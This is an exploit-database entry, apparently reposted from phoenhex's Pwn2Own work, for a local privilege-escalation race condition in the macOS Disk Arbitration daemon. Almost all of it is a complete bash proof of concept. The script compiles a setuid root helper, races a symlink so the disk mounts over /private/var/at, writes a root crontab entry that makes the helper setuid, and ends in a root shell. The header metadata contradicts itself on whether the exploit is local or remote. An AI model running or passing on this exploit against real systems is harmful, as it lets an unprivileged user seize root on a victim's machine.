Apple macOS - Disk Arbitration Daemon Race Condition

2017.06.10
Credit: phoenhex
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.6/10
Impact Subscore: 10/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/bin/bash
# Sources:
# https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc

# The PoC only works if the calling user can obtain the mount right.
if ! security authorize system.volume.internal.mount &>/dev/null; then
  echo >&2 "Cannot acquire system.volume.internal.mount right. This will not work."
  exit 1
fi

TARGET=/private/var/at
SUBDIR=tabs
DISK=/dev/disk0s1
TMPDIR=/tmp/pwn

mkdir -p $TMPDIR
cd $TMPDIR

# Small setuid helper that runs the command given as its only argument.
cat << EOF > boom.c
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char ** argv) {
  assert(argc == 2);
  setuid(0);
  setgid(0);
  system(argv[1]);
}
EOF

clang boom.c -o _boom || exit 1

# Keep flipping the symlink used as the mount point between two targets.
race_link() {
  mkdir -p mounts
  while true; do
    ln -snf mounts link
    ln -snf $TARGET link
  done
}

# Repeatedly mount/unmount until the volume ends up mounted over $TARGET.
race_mount() {
  while ! df -h | grep $TARGET >/dev/null; do
    while df -h | grep $DISK >/dev/null; do
      diskutil umount $DISK &>/dev/null
    done
    while ! df -h | grep $DISK >/dev/null; do
      diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
    done
  done
}

cleanup() {
  echo "Killing child process $PID and cleaning up tmp dir"
  kill -9 $PID
  rm -rf $TMPDIR
}

if df -h | grep $DISK >/dev/null; then
  echo >&2 "$DISK already mounted. Exiting."
  exit 1
fi

race_link &
PID=$!
trap cleanup EXIT

echo "Just imagine having that root shell. It's gonna be legen..."
race_mount
echo "wait for it..."

CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
rm -f /var/at/tabs/root
echo "* * * * *" "$CMD" > /var/at/tabs/root

while ! [ -e $TMPDIR/boom ]; do
  sleep 1
done

echo "dary!"
kill -9 $PID
sleep 0.1

$TMPDIR/boom "rm /var/at/tabs/root"
$TMPDIR/boom "umount -f $DISK"
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"

References:

https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc



Copyright 2018, cxsecurity.com
